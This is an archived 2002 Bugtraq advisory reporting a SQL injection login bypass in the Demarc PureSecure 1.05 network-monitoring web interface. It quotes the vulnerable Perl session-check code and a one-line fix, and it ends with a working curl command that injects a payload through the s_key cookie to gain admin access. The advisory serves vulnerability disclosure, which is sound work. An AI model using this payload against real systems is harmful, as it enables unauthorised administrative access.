[25072] in bugtraq
Demarc PureSecure 1.05 may be other (user can bypass login)
daemon@ATHENA.MIT.EDU (pokleyzz sakamaniaka)
Tue Apr 16 15:41:23 2002
Date: 15 Apr 2002 07:32:18 -0000
Message-ID: <20020415073218.3088.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: pokleyzz sakamaniaka <pokleyzz@hotmail.com>
To: bugtraq@securityfocus.com
Demarc PureSecure (http://www.demarc.org) is an
all-inclusive network monitoring solution that allows
you to monitor an entire network of servers from one
powerful web interface.
user can bypass login and get admin status by sql
injection through cookies s_key
--------- line 319 ------------------------------
elsif (($cookies{'s_key'}) && ($cookies{'s_key'}-
>value)){
$logged_in_as = &check_login($cookies
{'s_key'}->value);
if (!$logged_in_as){
&print_login_screen;
&safe_exit;
}
-----------------------------------------------------
s_key = will be use for sql in fuction check_login
query ( line 6114)
---------lini 6114---------------------------------
$sql_query = " SELECT \
f1,f2,f3,admin,username,UNIX_TIMESTAMP
(current_login_timedate) AS LOGINTIME \
FROM \
dm_sessions \
WHERE current_session_id
= '$session_id' ";
-----------------------------------------------------
-=solution=-
line 6113: &safe_slash(\$session_id' );
using curl (http://curl.haxx.se/download/):
curl -b s_key=\'%20OR%20current_session_id%
20like%20\'%\'%23 https://<lame host>/dm/demarc
http://www.inetd-secure.net
http://www.mybsd.org
